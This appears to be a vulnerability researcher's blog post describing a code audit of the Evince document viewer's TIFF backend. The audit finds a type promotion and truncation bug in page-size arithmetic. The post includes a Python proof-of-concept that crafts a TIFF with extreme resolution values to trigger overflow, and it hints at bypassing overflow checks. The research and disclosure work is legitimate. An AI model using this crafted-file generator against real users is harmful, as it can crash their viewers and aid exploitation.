Evince Integer Overflow and Truncation Due to Type Promotion in TIFF Backend

Posted on Thu 01 August 2024 in Thought, vulnerability research and discovery

I have been pretty facinated with type promotion bugs in the recent months. Why? Because I love when there is some crazy mixed data types with arithmetic. Something about math (in)correctly implemented always makes me geek out. For those not familiar with Type promotion, it's when data type values like a small number turns into a bigger number and vice versa.

One way to describe a type promotion is like taking a dozen eggs in a egg carton and attempting to put all dozen in a half a dozen egg carton. You will have undesired and messy results. In software development this can lead to overflow bugs and loss of precision for critical programs.

So it was only natural for me to audit more code in hopes to find more of them. The below research was done for fun back in May 2024. What I found, is that typically you have a good chance at finding type promotion bugs in code bases that:

  • Do file parsing
  • Do image parsing
  • Almost any arithmetic that looks funny and gets reassigned back to declared variable

A couple other reasons for chasing this path was to get better at spotting these bugs and to catalogue my methodology. I find that there is tons of content on "I found a vulnerability, let's exploit it" vs "How I approached auditing code like a developer to trigger a bug which may have security impact". While clearly the latter title doesnt capture the hype train, it does hold weight to understand more of whats being done with a code base, which could lead to a bigger impact.

Choosing Evince

I wanted to focus on something that is default to my virtual machine (vm) installation. Mainly because when users install the VM, they rarely change much about the defaults making what I find, "just work".

My default VM install is running on vanilla Debian install (below the hostnamectl command):

Operating System: Debian GNU/Linux 12 (bookworm)

Kernel: Linux 6.1.0-20-arm64

Architecture: arm64

A few other criterias for finding security impacting bugs were:

  • Ideally from "Apps for Gnome", since software is open source and somewhat documented
  • Smaller code base for application comprehension and bug identification
  • "Easy" to document for bug submission either to project or bug bounty program

After narrowing my potential candidates down based on criteria, I landed on Evince.

Evince Comprehension

Instead of diving directly deep into the code, its important to understand a bit of what and how Evince works. There are several ways to go about that research but I started with the below:

Define Evince's application purpose

  • Document viewer for multiple document formats
  • Original goals was to replace viewers that existed on Gnome Desktop
  • Nuggets from the old wiki was useful for understanding original goals

There is a newer general descriptive version found here

A document viewer for the GNOME desktop. You can view, search or annotate documents in many different formats.

Evince supports documents in: PDF, PS, EPS, XPS, DjVu, TIFF, DVI (with SyncTeX), and Comic Books archives (CBR, CBT, CBZ, CB7).

As you can see, Evince supports several file formats which also peaked my interests. Some of the noted formats have previously and continously have security issues in other document application readers when it comes to file or image parsing.

Evince has several ways of being invoked:

  • evince
  • evince-previewer
  • evince-thumbnailer

Those commands are of interests based on how the code base is laid out. More on that later.

The Research

Now that we know some general information, its best to start with some knowns about Evince, such as version installed, most recent published version, publicly known vulnerabilities. So I gathered information on the Evince version installed on the VM:

evince --version
GNOME Document Viewer 43.1

Identifying Evince project page, code repository helped with the direction and understanding of the code and application.

I also searched around in their gitlab ISSUES for previously reported bugs and vulnerabilities. Which I ended up finding some pretty interesting ones awhile back:

What I find cool when looking at previous issues:

  • Buggy lines of code identified
  • Full stack trace
  • Tools to leverage finding memory management issues valgrind
  • POC or files used to trigger the bug
  • Mitigated lines of code or patches

The below command injection vulnerability was also neat:

In fact, I believe there is also similar code in the DVI backend except not vulnerable due to g_shell_quote() being used on the filename. But who knows how far back that change was implemented.....

DVI command execution code

Last but not least a fuzzed test case:

I found a few more bugs (google searches and cve databases) but I think you as the reader might get the picture, research your target application to understand usage and previously known vulnerabilities.

The codebase

Now its time to look at the codebase to try and understand:

  • How the code is laid out, i.e subsystems, components
  • How the developers intend the code to be configured, compiled, run and contributions

Once I feel comfortable with the two above then I can start doing some manual code auditing.

Code Layout

Below is a snippet of code layout:

backend/
build-aux/
cut-n-paste/
data/
help/
libdocument/
libmisc/
libview/
po/
previewer/
properties/
shell/
subprojects/
thumbnailer/
.gitlab-ci.yml
AUTHORS
ChangeLog.pre-git
CONTRIBUTING.md
evince-document.h
evince-view.h
MAINTAINERS
meson_options.txt
meson.build
NEWS
NEWS-security.md
NOTES
README.md
TODO

Below are the folders I considered subsystems as they are functionally different parts of the Evince application.

  • backend/
  • build-aux/
  • cut-n-paste/
  • libdocument/
  • libmisc/
  • libview/
  • previewer/
  • properties/
  • shell/
  • subprojects/
  • thumbnailer/

If you recall earlier, I stated there were three ways to invoke evince, you can see previewer and thumbnailer folders exist, which is code related to running Evince with evince-previewer and evince-thumbnailer respectfully.

The backend/ directory is related to Evince supported documents, which ill consider sub-subsystems:

 - backend/comics
 - backend/djvu
 - backend/dvi 
 - backend/pdf 
 - backend/ps 
 - backend/tiff 
 - backend/xps

The other files, I mention below are worth looking into because they typically contain, what changed in a release, security issues, how to configure and compile the application or general notes/resources worth having initially at the beginning of the audit.

I highly recommend reading these files

  • meson_options.txt
  • meson.build
  • NEWS
  • NEWS-security.md
  • NOTES
  • README.md
  • TODO

As stated earlier I am interesting in mostly the backend subsystems as they deal with document handling. I went through several of the sub-subsystems in the backend directory and found some bugs (which I recommend others to investigate) but I am only going to talk about backend/tiff from here on out.

Backend/tiff audit

There are 7 files in the Tiff backend but I am only interested in the C files and the headers.

Starting with tiff-document.c is where we start to explore the code in some depth. I should mention, I took a bit of a refresher to review some K&R and The Art of Software Security Assessments (TAOSS) notes I have, particularly Chapter 5 (Type conversion + Type Conversion Vulnerabilities) of TAOSS. This help me immensely to get up to speed.

When looking through code, developers sometimes leave notes for themselves or future developers. It might help to scan for things like "FIXME", "TODO", etc which could give away some tips on bugs. This didnt yield much in my initial view, so I decided to approach auditing line by line. It was really the only way to understad what the code purpose was.

After the first quick scan of functions, I distilled down the purpose of the code to essentially handle TIFF - Tag Image File Format (TIFF), documents.

In simple terms: TIFF is a format used to save really detailed pictures that need to look good, even when zoomed in or printed out. TIFF files can store a lot of detail in the image, making them great for printing and editing, but because of that, they can also be pretty big in size.

tiff-document.c functions that I thought were worth noting:

What I liked about these function were that:

  • They deal with document size/resolution
  • User controlled input (potential attack vector on a component)
  • ripe for TIFF document manipulation 😈

Starting with tiff_document_get_resolution()

tiff_document_get_resolution()

Key highlights:

  • 4 gfloat variables (2 declared and initialized & 2 declared in the function arguments)
  • 1 gushort declared and uninitialized

The 2 of the variables X and Y, can be controlled by the user when generating a TIFF document. TIFFGetField attempts to get the values of X and Y before doing any conversion or continue to the bottom block of code which handles 0 value edge case. While this function doesnt yield a desired bug, it does get me familar to the values I should see throughout the code for manipulating resolution, checking the resolution size and so forth.

Moving to tiff_document_get_page_size() is where things start to get a bit interesting.

tiff_document_get_page_size - 1

tiff_document_get_page_size - 2

If you are reviewing closely, we now have some arithmetic being performed on mixed data types.

  • w and h are guint32 (unsigned 32-bit integers)
  • x_res and y_res are gfloat (32-bit floating-point numbers)

The arithmetic operation being performed is:

 h = h * (x_res / y_res); 

So what is happening?

Let's walk through this.

  • x_res / y_res
    • Both x_res and y_res are gfloat, so this division operation results in a gfloat.
  • h * (x_res / y_res)
    • h is a guint32, which is an integer. However, because it’s being multiplied by a gfloat, the h value is promoted to a gfloat for the multiplication.

The Type Promotion

  • The value of h (originally a guint32) is implicitly promoted to a gfloat during the multiplication operation with (x_res / y_res) because the result of the multiplication must match the type of the floating-point value on the right side.
  • After the multiplication, the result is a floating-point number (gfloat).

But, Truncation?

  • The result of the multiplication, which is a gfloat, is then assigned back to h, which is a guint32.
  • This assignment will truncate the floating-point result back to an integer.
  • Any fractional part will be lost, which could lead to a loss of precision or a crash 😈😈😈

So now we have a Type promotion bug combined with a Truncation issue. I shouldnt have to say it but if you are leveraging floats for percision then know that mixed data types will haunt you until you handle them with care.

So What?

Well, now that we found the bug, it needs to be triggered to see if it can lead to undefined behavior. That means writing code or leveraging the application usage to trigger the tiff_document_get_page_size component since its out initial attack vector. If you been following along you will notice I mentioned tiff_document_render() as the other interesting function. That is because that function will help trigger our potentially vulnerable path.

Identifying a bug is only part of the equation, if you plan on helping patch the code, writing a bug report, attempting to exploit the bug, etc, then you are going to need to be able to reproduce and communicate it clearly to your audience.

Luckily we spent time on understanding the application purposes and usage earlier, so triggering the bug shouldnt be a problem, right? right?

right right

The POC

Well there are a couple different ways you can appoach generating a TIFF file for Evince to read, but I went the simple route, Python and Python Image Library (PILLOW).

#!/usr/bin/env python
# jay@stellersjay.pub
# X: https://x.com/call_eax
# Mastadon: https://infosec.exchange/@calleax
from PIL import Image
import numpy as np

# Define the page size in pixels (width, height)
# Slightly increased dimensions to push closer to overflow conditions
page_width = 16384  # Incremented slightly to push closer to limit
page_height = 21000  # Incremented slightly

# Create a new image with the specified size and mode
image = Image.new('RGB', (page_width, page_height), color=(255, 255, 255))

# Define resolutions to trigger type promotion bug
# Fine-tune the resolution values for maximum effect without causing immediate failure
x_res = np.finfo(np.float32).max / 19000  # Slightly less extreme than before
y_res = 0.1 # Slightly decreased to increase the ratio

# Save the image as a TIFF file with these new settings
image.save('crafted_output.tiff', format='TIFF', dpi=(x_res, y_res))

print("Optimized TIFF file created successfully with dimensions:", (page_width, page_height), "and resolution:", (x_res, y_res))

I also added the proof of concept and associated files to github. When running the POC, it might be useful to monitor system logs (journalctl) or similar along with maybe installation of systemd-coredump. I wont go into details in this post but system logs can be highly effective and useful for bug hunting

If you are looking at system debug logs or at a debugger (I'll cover this another post with Cairo as an example) you will notice some output like below which comes from the tiff_document_render() function.

overflow warnings

The above is the warning and below the LOC where it tells you its overflowing

overflow in function code

If you play with he values page_width, page_height and fine-tune the x_res and y_res you can potentially attempt to bypass the oveflow checks which might get you a set of different undefined behaviors like below.

fine-tune resolution

Fine-tune resolution results.

Wrapping it up...for now

While this post focused on the identification of type promotion bugs in the TIFF backend of Evince, there’s a lot more that I didn’t get to cover this time around. Topics like reverse engineering the binary application, leveraging built-in system and developer tools to identify unsafe code and memory leaks are critical to a thorough audit. As mentioned earlier, I'll be diving into these in a future post, where I'll highlight how these techniques can uncover even more subtle vulnerabilities.

Type promotion bugs like the one we explored in the TIFF backend of Evince are a subtle yet a reminder of the complexity and fragility of software systems. Finding and understanding these bugs requires not just a deep dive into the code like the developer, but also a thoughtful approach to how different data types interact within a program.

The chronicle doesn't end here—there's still plenty of ground to cover, especially when it comes to triggering and exploiting these vulnerabilities in a controlled environment (or sending as a payload). In future posts, I'll dive deeper into methods for exploiting such bugs, as well as exploring other fascinating aspects of vulnerability research.

If you're interested in this type of research, or if you have any questions, feel free to reach out—I’d love to hear your thoughts and experiences.